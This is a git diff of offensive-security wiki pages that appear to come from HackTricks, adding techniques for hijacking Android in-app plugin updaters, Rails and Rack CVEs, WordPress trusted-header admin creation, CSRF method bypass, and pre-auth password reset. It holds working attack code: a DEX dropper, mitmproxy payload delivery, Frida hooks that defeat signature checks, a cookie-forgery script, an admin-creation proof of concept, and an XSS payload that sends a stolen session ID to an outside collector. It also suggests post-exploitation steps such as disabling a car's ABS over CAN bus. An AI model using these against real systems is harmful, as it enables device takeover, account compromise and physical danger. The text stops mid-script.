@ -148,7 +148,8 @@ if (ptrace) {
}
```
See also:
{{#ref}}
reversing-native-libraries.md
{{#endref}}
@ -178,9 +179,11 @@ apk-mitm app.apk
- Tool: https://github.com/shroudedcode/apk-mitm
- For network config CA-trust tricks (and Android 7+ user CA trust), see:
{{#ref}}
make-apk-accept-ca-certificate.md
{{#endref}}
{{#ref}}
install-burp-certificate.md
{{#endref}}
@ -224,4 +227,4 @@ apk-mitm app.apk
- [Apktool install guide](https://apktool.org/docs/install)
- [Magisk](https://github.com/topjohnwu/Magisk)
{{#include ../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -2,15 +2,50 @@
{{#include ../../banners/hacktricks-training.md}}
Many Android applications implement their own “plugin” or “dynamic feature” update channels instead of using the Google Play Store. When the implementation is insecure an attacker able to intercept or tamper with the update traffic can supply arbitrary native or Dalvik/ART code that will be loaded inside the app process, leading to full Remote Code Execution (RCE) on the handset and in some cases on any external device controlled by the app (cars, IoT, medical devices …).
This page summarises a real-world vulnerability chain found in the Xtool AnyScan automotive-diagnostics app (v4.40.11 → 4.40.40) and generalises the technique so you can audit other Android apps and weaponise the mis-configuration during a red-team engagement.
---
## 0. Quick triage: does the app have an in-app updater?
Static hints to look for in JADX/apktool:
- Strings: "update", "plugin", "patch", "upgrade", "hotfix", "bundle", "feature", "asset", "zip".
- Network endpoints like `/update`, `/plugins`, `/getUpdateList`, `/GetUpdateListEx`.
- Crypto helpers near update paths (DES/AES/RC4; Base64; JSON/XML packs).
- Dynamic loaders: `System.load`, `System.loadLibrary`, `dlopen`, `DexClassLoader`, `PathClassLoader`.
- Unzip paths writing under app-internal or external storage, then immediately loading a `.so`/DEX.
Runtime hooks to confirm:
```js
// Frida: log native and dex loading
Java.perform(() => {
const Runtime = Java.use('java.lang.Runtime');
const SystemJ = Java.use('java.lang.System');
const DexClassLoader = Java.use('dalvik.system.DexClassLoader');
SystemJ.load.overload('java.lang.String').implementation = function(p) {
console.log('[System.load] ' + p); return this.load(p);
};
SystemJ.loadLibrary.overload('java.lang.String').implementation = function(n) {
console.log('[System.loadLibrary] ' + n); return this.loadLibrary(n);
};
Runtime.load.overload('java.lang.String').implementation = function(p){
console.log('[Runtime.load] ' + p); return this.load(p);
};
DexClassLoader.$init.implementation = function(dexPath, optDir, libPath, parent) {
console.log(`[DexClassLoader] dex=${dexPath} odex=${optDir} jni=${libPath}`);
return this.$init(dexPath, optDir, libPath, parent);
};
});
```
---
## 1. Identifying an Insecure TLS TrustManager
1. Decompile the APK with jadx / apktool and locate the networking stack (OkHttp, HttpUrlConnection, Retrofit…).
2. Look for a custom `TrustManager` or `HostnameVerifier` that blindly trusts every certificate:
```java
public static TrustManager[] buildTrustManagers() {
@ -24,26 +59,37 @@ public static TrustManager[] buildTrustManagers() {
}
```
3. If present, the application will accept any TLS certificate → you can run a transparent MITM proxy with a self-signed cert:
```bash
mitmproxy -p 8080 -s addon.py # see §4
iptables -t nat -A OUTPUT -p tcp --dport 443 -j REDIRECT --to-ports 8080 # on rooted device / emulator
```
If TLS pinning is enforced instead of unsafe trust-all logic, see:
{{#ref}}
android-anti-instrumentation-and-ssl-pinning-bypass.md
{{#endref}}
{{#ref}}
make-apk-accept-ca-certificate.md
{{#endref}}
---
## 2. Reverse-Engineering the Update Metadata
In the AnyScan case each app launch triggers an HTTPS GET to:
```
https://apigw.xtoolconnect.com/uhdsvc/UpgradeService.asmx/GetUpdateListEx
```
The response body is an XML document whose `<FileData>` nodes contain Base64-encoded, DES-ECB encrypted JSON describing each available plugin.
Typical hunting steps:
1. Locate the crypto routine (e.g. `RemoteServiceProxy`) and recover:
- algorithm (DES / AES / RC4 …)
- mode of operation (ECB / CBC / GCM …)
- hard-coded key / IV (commonly 56-bit DES or 128-bit AES constants)
2. Re-implement the function in Python to decrypt / encrypt the metadata:
```python
@ -61,8 +107,16 @@ def encrypt_metadata(plaintext: bytes) -> str:
return b64encode(cipher.encrypt(plaintext.ljust((len(plaintext)+7)//8*8, b"\x00"))).decode()
```
Notes seen in the wild (2023-2025):
- Metadata is often JSON-within-XML or protobuf; weak ciphers and static keys are common.
- Many updaters accept plain HTTP for the actual payload download even if metadata comes over HTTPS.
- Plugins frequently unzip to app-internal storage; some still use external storage or legacy `requestLegacyExternalStorage`, enabling cross-app tampering.
---
## 3. Craft a Malicious Plugin
### 3.1 Native library path (dlopen/System.load[Library])
1. Pick any legitimate plugin ZIP and replace the native library with your payload:
```c
@ -80,11 +134,38 @@ $ zip -r PWNED.zip libscan_x64.so assets/ meta.txt
```
2. Update the JSON metadata so that `"FileName" : "PWNED.zip"` and `"DownloadURL"` points to your HTTP server.
3. Re-encrypt + Base64-encode the modified JSON and copy it back inside the intercepted XML.
### 3.2 Dex-based plugin path (DexClassLoader)
Some apps download a JAR/APK and load code via `DexClassLoader`. Build a malicious DEX that triggers on load:
```java
// src/pwn/Dropper.java
package pwn;
public class Dropper {
static { // runs on class load
try {
Runtime.getRuntime().exec("sh -c 'id > /data/data/<pkg>/files/pwned' ");
} catch (Throwable t) {}
}
}
```
```bash
# Compile and package to a DEX jar
javac -source 1.8 -target 1.8 -d out/ src/pwn/Dropper.java
jar cf dropper.jar -C out/ .
d8 --output outdex/ dropper.jar
cd outdex && zip -r plugin.jar classes.dex # the updater will fetch this
```
If the target calls `Class.forName("pwn.Dropper")` your static initializer executes; otherwise, reflectively enumerate loaded classes with Frida and call an exported method.
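If you prefer driving Frida from Python, here is a sketch (using the `frida` Python bindings) that attaches to the app, looks for classes loaded from the injected plugin and tries to invoke a method reflectively; the package name, class prefix and method name are hypothetical examples:

```python
# Sketch: enumerate classes loaded from a dex plugin and poke one of them.
# Names below are hypothetical; adjust to the target app and plugin.
import sys
import frida

PACKAGE = "com.example.victim"        # hypothetical target app

JS = r"""
Java.perform(function () {
    Java.enumerateLoadedClasses({
        onMatch: function (name) {
            if (name.indexOf("pwn.") === 0) {   // classes from the injected plugin
                send("loaded: " + name);
                try {
                    var k = Java.use(name);
                    // try a no-arg method if the plugin exposes one
                    if (k.run) { k.run(); send("invoked " + name + ".run()"); }
                } catch (e) { send("err: " + e); }
            }
        },
        onComplete: function () { send("enumeration done"); }
    });
});
"""

def on_message(message, data):
    print("[frida]", message.get("payload", message))

device = frida.get_usb_device()
session = device.attach(PACKAGE)
script = session.create_script(JS)
script.on("message", on_message)
script.load()
sys.stdin.read()   # keep the hook alive
```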
---
## 4. Deliver the Payload with mitmproxy
`addon.py` example that silently swaps the original metadata:
```python
from mitmproxy import http
@ -99,37 +180,72 @@ def request(flow: http.HTTPFlow):
)
```
Run a simple web server to host the malicious ZIP/JAR:
```bash
python3 -m http.server 8000 --directory ./payloads
```
When the victim launches the app it will:
- fetch our forged XML over the MITM channel;
- decrypt & parse it with the hard-coded crypto;
- download `PWNED.zip` or `plugin.jar` → unzip inside private storage;
- load the included `.so` or DEX, instantly executing our code with the app's permissions (camera, GPS, Bluetooth, filesystem, …).
Because the plugin is cached on disk the backdoor persists across reboots and runs every time the user selects the related feature.
---
## 4.1 Bypassing signature/hash checks (when present)
If the updater validates signatures or hashes, hook verification to always accept attacker content:
```js
// Frida make java.security.Signature.verify() return true
Java.perform(() => {
const Sig = Java.use('java.security.Signature');
Sig.verify.overload('[B').implementation = function(a) { return true; };
});
// Less surgical (use only if needed): defeat Arrays.equals() for byte[]
Java.perform(() => {
const Arrays = Java.use('java.util.Arrays');
Arrays.equals.overload('[B', '[B').implementation = function(a, b) { return true; };
});
```
Also consider stubbing vendor methods such as `PluginVerifier.verifySignature()`, `checkHash()`, or short-circuiting update gating logic in Java or JNI.
---
## 5. Other attack surfaces in updaters (2023-2025)
- Zip Slip path traversal while extracting plugins: malicious entries like `../../../../data/data/<pkg>/files/target` overwrite arbitrary files. Always sanitize entry paths and use allowlists.
- External storage staging: if the app writes the archive to external storage before loading, any other app can tamper with it. Scoped Storage or internal app storage avoids this.
- Cleartext downloads: metadata over HTTPS but payload over HTTP → straightforward MITM swap.
- Incomplete signature checks: comparing only a single file hash, not the whole archive; not binding signature to developer key; accepting any RSA key present in the archive.
- React Native / Web-based OTA content: if native bridges execute JS from OTA without strict signing, arbitrary code execution in the app context is possible (e.g., insecure CodePush-like flows). Ensure detached update signing and strict verification.
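As a minimal sketch of the entry-path sanitisation recommended in the Zip Slip bullet above (stdlib only; the archive and destination paths are examples):

```python
# Sketch: extract an update archive while rejecting Zip Slip entries.
import os
import zipfile

def safe_extract(archive_path: str, dest_dir: str) -> None:
    dest_real = os.path.realpath(dest_dir)
    with zipfile.ZipFile(archive_path) as zf:
        for entry in zf.infolist():
            target = os.path.realpath(os.path.join(dest_real, entry.filename))
            # reject absolute paths and ../ escapes out of the destination
            if target != dest_real and not target.startswith(dest_real + os.sep):
                raise ValueError(f"blocked suspicious entry: {entry.filename}")
        zf.extractall(dest_real)

if __name__ == "__main__":
    safe_extract("plugin.zip", "./extracted_plugin")   # example paths
```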
---
## 6. Post-Exploitation Ideas
- Steal session cookies, OAuth tokens, or JWTs stored by the app.
- Drop a second-stage APK and silently install it via `pm install` if possible (some apps already declare `REQUEST_INSTALL_PACKAGES`).
- Abuse any connected hardware; in the AnyScan scenario you can send arbitrary OBD-II / CAN bus commands (unlock doors, disable ABS, etc.).
---
### Detection & Mitigation Checklist (blue team)
- Avoid dynamic code loading and out-of-store updates. Prefer Play-mediated updates. If dynamic plugins are a hard requirement, design them as data-only bundles and keep executable code in the base APK.
- Enforce TLS properly: no custom trust-all managers; deploy pinning where feasible and a hardened network security config that disallows cleartext traffic.
- Do not download executable code from outside Google Play. If you must, use detached update signing (e.g., Ed25519/RSA) with a developer-held key and verify before loading. Bind metadata and payload (length, hash, version) and fail closed.
- Use modern crypto (AES-GCM) with per-message nonces for metadata; remove hard-coded keys from clients.
- Validate integrity of downloaded archives: verify a signature that covers every file, or at minimum verify a manifest of SHA-256 hashes. Reject extra/unknown files.
- Store downloads in app-internal storage (or scoped storage on Android 10+) and use file permissions that prevent cross-app tampering.
- Defend against Zip Slip: normalize and validate zip entry paths before extraction; reject absolute paths or `..` segments.
- Consider Play “Code Transparency” to allow you and users to verify that shipped DEX/native code matches what you built (complements but does not replace APK signing).
---
## References
- [NowSecure Remote Code Execution Discovered in Xtool AnyScan App](https://www.nowsecure.com/blog/2025/07/16/remote-code-execution-discovered-in-xtool-anyscan-app-risks-to-phones-and-vehicles/)
- [Android Unsafe TrustManager patterns](https://developer.android.com/privacy-and-security/risks/unsafe-trustmanager)
- [Android Developers Dynamic Code Loading (risks and mitigations)](https://developer.android.com/privacy-and-security/risks/dynamic-code-loading)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -6,7 +6,95 @@
As explained in [this article](https://www.offsec.com/blog/cve-2024-46986/), uploading a `.rb` file into sensitive directories such as `config/initializers/` can lead to remote code execution (RCE) in Ruby on Rails applications.
Tips:
- Other boot/eager-load locations that are executed on app start are also risky when writeable (e.g., `config/initializers/` is the classic one). If you find an arbitrary file upload that lands anywhere under `config/` and is later evaluated/required, you may obtain RCE at boot.
- Look for dev/staging builds that copy user-controlled files into the container image where Rails will load them on boot.
## Active Storage image transformation → command execution (CVE-2025-24293)
When an application uses Active Storage with `image_processing` + `mini_magick`, and passes untrusted parameters to image transformation methods, Rails versions prior to 7.1.5.2 / 7.2.2.2 / 8.0.2.1 could allow command injection because some transformation methods were mistakenly allowed by default.
- A vulnerable pattern looks like:
```erb
<%= image_tag blob.variant(params[:t] => params[:v]) %>
```
where `params[:t]` and/or `params[:v]` are attacker-controlled.
- What to try during testing
- Identify any endpoints that accept variant/processing options, transformation names, or arbitrary ImageMagick arguments.
- Fuzz `params[:t]` and `params[:v]` for suspicious errors or execution side-effects. If you can influence the method name or pass raw arguments that reach MiniMagick, you may get code exec on the image processor host.
- If you only have read-access to generated variants, attempt blind exfiltration via crafted ImageMagick operations.
- Remediation/detections
- If you see Rails < 7.1.5.2 / 7.2.2.2 / 8.0.2.1 with Active Storage + `image_processing` + `mini_magick` and user-controlled transformations, consider it exploitable. Recommend upgrading and enforcing strict allowlists for methods/params and a hardened ImageMagick policy.
## Rack::Static LFI / path traversal (CVE-2025-27610)
If the target stack uses Rack middleware directly or via frameworks, versions of `rack` prior to 2.2.13, 3.0.14, and 3.1.12 allow Local File Inclusion via `Rack::Static` when `:root` is unset/misconfigured. Encoded traversal in `PATH_INFO` can expose files under the process working directory or an unexpected root.
- Hunt for apps that mount `Rack::Static` in `config.ru` or middleware stacks. Try encoded traversals against static paths, for example:
```text
GET /assets/%2e%2e/%2e%2e/config/database.yml
GET /favicon.ico/..%2f..%2f.env
```
Adjust the prefix to match configured `urls:`. If the app responds with file contents, you likely have LFI to anything under the resolved `:root`.
- Mitigation: upgrade Rack; ensure `:root` only points to a directory of public files and is explicitly set.
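Building on the hunting step above, a small probing sketch using raw `http.client` so the encoded `%2e%2e` sequences are sent verbatim; the host, prefix and candidate files are assumptions to adjust per target:

```python
# Sketch: probe a Rack::Static mount for encoded path traversal (CVE-2025-27610).
# http.client sends the request target as-is, avoiding client-side normalization.
import http.client

HOST = "target.example"            # assumption: set to the target host
PREFIX = "/assets"                 # assumption: match the configured urls:
CANDIDATES = [
    "%2e%2e/%2e%2e/config/database.yml",
    "%2e%2e/%2e%2e/.env",
    "%2e%2e/%2e%2e/config/secrets.yml",
]

for cand in CANDIDATES:
    conn = http.client.HTTPSConnection(HOST, timeout=10)  # use HTTPConnection for plain HTTP
    path = f"{PREFIX}/{cand}"
    conn.request("GET", path)
    resp = conn.getresponse()
    body = resp.read(200)
    print(f"{resp.status} {path} -> {body[:80]!r}")
    conn.close()
```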
## Forging/decrypting Rails cookies when `secret_key_base` is leaked
Rails encrypts and signs cookies using keys derived from `secret_key_base`. If that value leaks (e.g., in a repo, logs, or misconfigured credentials), you can usually decrypt, modify, and re-encrypt cookies. This often leads to authz bypass if the app stores roles, user IDs, or feature flags in cookies.
Minimal Ruby to decrypt and re-encrypt modern cookies (AES-256-GCM, default in recent Rails):
```ruby
require 'cgi'
require 'json'
require 'active_support'
require 'active_support/message_encryptor'
require 'active_support/key_generator'
secret_key_base = ENV.fetch('SECRET_KEY_BASE_LEAKED')
raw_cookie = CGI.unescape(ARGV[0])
salt = 'authenticated encrypted cookie'
cipher = 'aes-256-gcm'
key_len = ActiveSupport::MessageEncryptor.key_len(cipher)
secret = ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000).generate_key(salt, key_len)
enc = ActiveSupport::MessageEncryptor.new(secret, cipher: cipher, serializer: JSON)
plain = enc.decrypt_and_verify(raw_cookie)
puts "Decrypted: #{plain.inspect}"
# Modify and re-encrypt (example: escalate role)
plain['role'] = 'admin' if plain.is_a?(Hash)
forged = enc.encrypt_and_sign(plain)
puts "Forged cookie: #{CGI.escape(forged)}"
```
Notes:
- Older apps may use AES-256-CBC and salts `encrypted cookie` / `signed encrypted cookie`, or JSON/Marshal serializers. Adjust salts, cipher, and serializer accordingly.
- On compromise/assessment, rotate `secret_key_base` to invalidate all existing cookies.
## See also (Ruby/Rails-specific vulns)
- Ruby deserialization and class pollution:
{{#ref}}
../../pentesting-web/deserialization/README.md
{{#endref}}
{{#ref}}
../../pentesting-web/deserialization/ruby-class-pollution.md
{{#endref}}
{{#ref}}
../../pentesting-web/deserialization/ruby-_json-pollution.md
{{#endref}}
- Template injection in Ruby engines (ERB/Haml/Slim, etc.):
{{#ref}}
../../pentesting-web/ssti-server-side-template-injection/README.md
{{#endref}}
## References
- Rails Security Announcement: CVE-2025-24293 Active Storage unsafe transformation methods (fixed in 7.1.5.2 / 7.2.2.2 / 8.0.2.1). https://discuss.rubyonrails.org/t/cve-2025-24293-active-storage-allowed-transformation-methods-potentially-unsafe/89670
- GitHub Advisory: Rack::Static Local File Inclusion (CVE-2025-27610). https://github.com/advisories/GHSA-7wqh-767x-r66v
{{#include ../../banners/hacktricks-training.md}}

View File

@ -409,6 +409,53 @@ The `permission_callback` is a callback to function that checks if a given user
Of course, Wordpress uses PHP and files inside plugins are directly accessible from the web. So, in case a plugin is exposing any vulnerable functionality that is triggered just accessing the file, it's going to be exploitable by any user.
### Trusted-header REST impersonation (WooCommerce Payments ≤ 5.6.1)
Some plugins implement “trusted header” shortcuts for internal integrations or reverse proxies and then use that header to set the current user context for REST requests. If the header is not cryptographically bound to the request by an upstream component, an attacker can spoof it and hit privileged REST routes as an administrator.
- Impact: unauthenticated privilege escalation to admin by creating a new administrator via the core users REST route.
- Example header: `X-Wcpay-Platform-Checkout-User: 1` (forces user ID 1, typically the first administrator account).
- Exploited route: `POST /wp-json/wp/v2/users` with an elevated role array.
PoC
```http
POST /wp-json/wp/v2/users HTTP/1.1
Host: <WP HOST>
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
X-Wcpay-Platform-Checkout-User: 1
Content-Length: 114
{"username": "honeypot", "email": "wafdemo@patch.stack", "password": "demo", "roles": ["administrator"]}
```
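The same PoC as a small script, in case you prefer automating it; the target URL is a placeholder:

```python
# Sketch: send the trusted-header PoC above with requests (placeholders throughout).
import requests

TARGET = "https://victim-wp.example"          # placeholder
payload = {
    "username": "honeypot",
    "email": "wafdemo@patch.stack",
    "password": "demo",
    "roles": ["administrator"],
}
r = requests.post(
    f"{TARGET}/wp-json/wp/v2/users",
    json=payload,
    headers={"X-Wcpay-Platform-Checkout-User": "1"},
    timeout=15,
)
print(r.status_code)          # 201 => new admin created
print(r.text[:500])
```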
Why it works
- The plugin maps a client-controlled header to authentication state and skips capability checks.
- WordPress core expects the `create_users` capability for this route; the plugin's header shortcut bypasses it by directly setting the current user context from the header.
Expected success indicators
- HTTP 201 with a JSON body describing the created user.
- A new admin user visible in `wp-admin/users.php`.
Detection checklist
- Grep for `getallheaders()`, `$_SERVER['HTTP_...']`, or vendor SDKs that read custom headers to set user context (e.g., `wp_set_current_user()`, `wp_set_auth_cookie()`).
- Review REST registrations for privileged callbacks that lack robust `permission_callback` checks and instead rely on request headers.
- Look for usages of core user-management functions (`wp_insert_user`, `wp_create_user`) inside REST handlers that are gated only by header values.
Hardening
- Never derive authentication or authorization from client-controlled headers.
- If a reverse proxy must inject identity, terminate trust at the proxy and strip inbound copies (e.g., `unset X-Wcpay-Platform-Checkout-User` at the edge), then pass a signed token and verify it server-side.
- For REST routes performing privileged actions, require `current_user_can()` checks and a strict `permission_callback` (do NOT use `__return_true`).
- Prefer first-party auth (cookies, application passwords, OAuth) over header “impersonation”.
References: see the links at the end of this page for a public case and broader analysis.
### Unauthenticated Arbitrary File Deletion via wp_ajax_nopriv (Litho Theme <= 3.0)
WordPress themes and plugins frequently expose AJAX handlers through the `wp_ajax_` and `wp_ajax_nopriv_` hooks. When the **_nopriv_** variant is used **the callback becomes reachable by unauthenticated visitors**, so any sensitive action must additionally implement:
@ -561,6 +608,21 @@ add_action( 'profile_update', function( $user_id ) {
---
### WAF considerations for WordPress/plugin CVEs
Generic edge/server WAFs are tuned for broad patterns (SQLi, XSS, LFI). Many high-impact WordPress/plugin flaws are application-specific logic/auth bugs that look like benign traffic unless the engine understands WordPress routes and plugin semantics.
Offensive notes
- Target plugin-specific endpoints with clean payloads: `admin-ajax.php?action=...`, `wp-json/<namespace>/<route>`, custom file handlers, shortcodes.
- Exercise unauth paths first (AJAX `nopriv`, REST with permissive `permission_callback`, public shortcodes). Default payloads often succeed without obfuscation.
- Typical high-impact cases: privilege escalation (broken access control), arbitrary file upload/download, LFI, open redirect.
Defensive notes
- Don't rely on generic WAF signatures to protect plugin CVEs. Implement application-layer, vulnerability-specific virtual patches or update quickly.
- Prefer positive-security checks in code (capabilities, nonces, strict input validation) over negative regex filters.
## WordPress Protection
### Regular Updates
@ -657,5 +719,8 @@ The server responds with the contents of `wp-config.php`, leaking DB credentials
- [Multiple Critical Vulnerabilities Patched in WP Job Portal Plugin](https://patchstack.com/articles/multiple-critical-vulnerabilities-patched-in-wp-job-portal-plugin/)
- [Rare Case of Privilege Escalation in ASE Plugin Affecting 100k+ Sites](https://patchstack.com/articles/rare-case-of-privilege-escalation-in-ase-plugin-affecting-100k-sites/)
- [ASE 7.6.3 changeset delete original roles on profile update](https://plugins.trac.wordpress.org/changeset/3211945/admin-site-enhancements/tags/7.6.3/classes/class-view-admin-as-role.php?old=3208295&old_path=admin-site-enhancements%2Ftags%2F7.6.2%2Fclasses%2Fclass-view-admin-as-role.php)
- [Hosting security tested: 87.8% of vulnerability exploits bypassed hosting defenses](https://patchstack.com/articles/hosting-security-tested-87-percent-of-vulnerability-exploits-bypassed-hosting-defenses/)
- [WooCommerce Payments ≤ 5.6.1 Unauth privilege escalation via trusted header (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/woocommerce-payments/vulnerability/wordpress-woocommerce-payments-plugin-5-6-1-unauthenticated-privilege-escalation-vulnerability)
- [Hackers exploiting critical WordPress WooCommerce Payments bug](https://www.bleepingcomputer.com/news/security/hackers-exploiting-critical-wordpress-woocommerce-payments-bug/)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -293,3 +293,4 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S
{{#include ../../banners/hacktricks-training.md}}

View File

@ -37,9 +37,39 @@ Understanding and implementing these defenses is crucial for maintaining the sec
## Defences Bypass
### From POST to GET (method-conditioned CSRF validation bypass)
Maybe the form you want to abuse is prepared to send a **POST request with a CSRF token**, but you should **check** whether a **GET** is also **valid** and whether the **CSRF token is still validated** when the request is sent as GET.
Some applications only enforce CSRF validation on POST while skipping it for other verbs. A common anti-pattern in PHP looks like:
```php
public function csrf_check($fatal = true) {
if ($_SERVER['REQUEST_METHOD'] !== 'POST') return true; // GET, HEAD, etc. bypass CSRF
// ... validate __csrf_token here ...
}
```
If the vulnerable endpoint also accepts parameters from `$_REQUEST`, you can reissue the same action as a GET request and omit the CSRF token entirely. This converts a POST-only action into a GET action that succeeds without a token.
Example:
- Original POST with token (intended):
```http
POST /index.php?module=Home&action=HomeAjax&file=HomeWidgetBlockList HTTP/1.1
Content-Type: application/x-www-form-urlencoded
__csrf_token=sid:...&widgetInfoList=[{"widgetId":"https://attacker<img src onerror=alert(1)>","widgetType":"URL"}]
```
- Bypass by switching to GET (no token):
```http
GET /index.php?module=Home&action=HomeAjax&file=HomeWidgetBlockList&widgetInfoList=[{"widgetId":"https://attacker<img+src+onerror=alert(1)>","widgetType":"URL"}] HTTP/1.1
```
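A quick tester sketch that replays the action as a token-less GET; the endpoint and parameters follow the example above and are otherwise placeholders (add session cookies if the action requires an authenticated victim context):

```python
# Sketch: check whether CSRF validation is only enforced for POST.
import requests

BASE = "https://victim.example/index.php"     # placeholder
params = {
    "module": "Home",
    "action": "HomeAjax",
    "file": "HomeWidgetBlockList",
    "widgetInfoList": '[{"widgetId":"https://attacker<img src onerror=alert(1)>","widgetType":"URL"}]',
}

# GET without any __csrf_token: if the action succeeds, validation is method-conditioned.
# cookies={"PHPSESSID": "..."} may be needed for authenticated endpoints.
r = requests.get(BASE, params=params, timeout=15)
print("GET (no token):", r.status_code, len(r.text))
```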
Notes:
- This pattern frequently appears alongside reflected XSS where responses are incorrectly served as text/html instead of application/json.
- Pairing this with XSS greatly lowers exploitation barriers because you can deliver a single GET link that both triggers the vulnerable code path and avoids CSRF checks entirely.
### Lack of token
@ -684,9 +714,6 @@ with open(PASS_LIST, "r") as f:
- [https://portswigger.net/web-security/csrf/bypassing-token-validation](https://portswigger.net/web-security/csrf/bypassing-token-validation)
- [https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses](https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses)
- [https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html](https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html)
- [https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)
{{#include ../banners/hacktricks-training.md}}

View File

@ -1097,6 +1097,7 @@ Treat any path where untrusted bytes reach `Marshal.load`/`marshal_load` as an R
- Minimal vulnerable Rails code path:
```ruby
class UserRestoreController < ApplicationController
def show

View File

@ -691,7 +691,7 @@ lfi2rce-via-temp-file-uploads.md
### Via `pearcmd.php` + URL args
As [**explained in this post**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp), the script `/usr/local/lib/php/pearcmd.php` exists by default in php docker images. Moreover, it's possible to pass arguments to the script via the URL because it's indicated that if a URL param doesn't have an `=`, it should be used as an argument. See also [watchTowr's write-up](https://labs.watchtowr.com/form-tools-we-need-to-talk-about-php/) and [Orange Tsai's “Confusion Attacks”](https://blog.orange.tw/posts/2024-08-confusion-attacks-en/).
The following request create a file in `/tmp/hello.php` with the content `<?=phpinfo()?>`:
@ -750,6 +750,9 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
- [PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders)
- [Horizon3.ai From Support Ticket to Zero Day (FreeFlow Core path traversal → arbitrary write → webshell)](https://horizon3.ai/attack-research/attack-blogs/from-support-ticket-to-zero-day/)
- [Xerox Security Bulletin 025-013 FreeFlow Core 8.0.5](https://securitydocs.business.xerox.com/wp-content/uploads/2025/08/Xerox-Security-Bulletin-025-013-for-Freeflow-Core-8.0.5.pdf)
- [watchTowr We need to talk about PHP (pearcmd.php gadget)](https://labs.watchtowr.com/form-tools-we-need-to-talk-about-php/)
- [Orange Tsai Confusion Attacks on Apache](https://blog.orange.tw/posts/2024-08-confusion-attacks-en/)
- [VTENEXT 25.02 a three-way path to RCE](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)
{{#file}}
EN-Local-File-Inclusion-1.pdf

View File

@ -70,6 +70,15 @@ cookie-jar-overflow.md
{{#endref}}
- It's possible to use [**Cookie Smuggling**](#cookie-smuggling) attack to exfiltrate these cookies
- If any server-side endpoint echoes the raw session ID in the HTTP response (e.g., inside HTML comments or a debug block), you can bypass HttpOnly by using an XSS gadget to fetch that endpoint, regex the secret, and exfiltrate it. Example XSS payload pattern:
```js
// Extract content between <!-- startscrmprint --> ... <!-- stopscrmprint -->
const re = /<!-- startscrmprint -->([\s\S]*?)<!-- stopscrmprint -->/;
fetch('/index.php?module=Touch&action=ws')
.then(r => r.text())
.then(t => { const m = re.exec(t); if (m) fetch('https://collab/leak', {method:'POST', body: JSON.stringify({leak: btoa(m[1])})}); });
```
### Secure
@ -327,7 +336,9 @@ There should be a pattern (with the size of a used block). So, knowing how are a
- [https://blog.ankursundara.com/cookie-bugs/](https://blog.ankursundara.com/cookie-bugs/)
- [https://www.linkedin.com/posts/rickey-martin-24533653_100daysofhacking-penetrationtester-ethicalhacking-activity-7016286424526180352-bwDd](https://www.linkedin.com/posts/rickey-martin-24533653_100daysofhacking-penetrationtester-ethicalhacking-activity-7016286424526180352-bwDd)
- [https://portswigger.net/research/bypassing-wafs-with-the-phantom-version-cookie](https://portswigger.net/research/bypassing-wafs-with-the-phantom-version-cookie)
- [https://seclists.org/webappsec/2006/q2/181](https://seclists.org/webappsec/2006/q2/181)
- [https://www.michalspacek.com/stealing-session-ids-with-phpinfo-and-how-to-stop-it](https://www.michalspacek.com/stealing-session-ids-with-phpinfo-and-how-to-stop-it)
- [https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -881,4 +881,3 @@ def handleResponse(req, interesting):
{{#include ../../banners/hacktricks-training.md}}

View File

@ -143,9 +143,10 @@ Practical use cases:
This pairs well with header-reflection cache poisoning. See:
{{#ref}}
cache-deception/README.md
{{#endref}}
- [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/)
### Obfuscation <a href="#ip-rotation" id="ip-rotation"></a>
@ -245,4 +246,3 @@ data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascri
{{#include ../banners/hacktricks-training.md}}

View File

@ -247,10 +247,50 @@ uuid-insecurities.md
print("[+] Attck stopped")
```
## Arbitrary password reset via skipOldPwdCheck (pre-auth)
Some implementations expose a password change action that calls the password-change routine with `skipOldPwdCheck=true` and does not verify any reset token or ownership. If the endpoint accepts an action parameter like `change_password` and a username/new password in the request body, an attacker can reset arbitrary accounts pre-auth.
Vulnerable pattern (PHP):
```php
// hub/rpwd.php
RequestHandler::validateCSRFToken();
$RP = new RecoverPwd();
$RP->process($_REQUEST, $_POST);
// modules/Users/RecoverPwd.php
if ($request['action'] == 'change_password') {
$body = $this->displayChangePwd($smarty, $post['user_name'], $post['confirm_new_password']);
}
public function displayChangePwd($smarty, $username, $newpwd) {
$current_user = CRMEntity::getInstance('Users');
$current_user->id = $current_user->retrieve_user_id($username);
// ... criteria checks omitted ...
$current_user->change_password('oldpwd', $_POST['confirm_new_password'], true, true); // skipOldPwdCheck=true
emptyUserAuthtokenKey($this->user_auth_token_type, $current_user->id);
}
```
Exploitation request (concept):
```http
POST /hub/rpwd.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
action=change_password&user_name=admin&confirm_new_password=NewP@ssw0rd!
```
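The same request scripted with requests; the base URL and username are placeholders, and the endpoint/parameters follow the pattern above (some deployments also validate a pre-auth obtainable CSRF token, per the PHP snippet, so you may need to add it to the body):

```python
# Sketch: pre-auth arbitrary password reset via a skipOldPwdCheck-style flow.
import requests

BASE = "https://victim.example"               # placeholder
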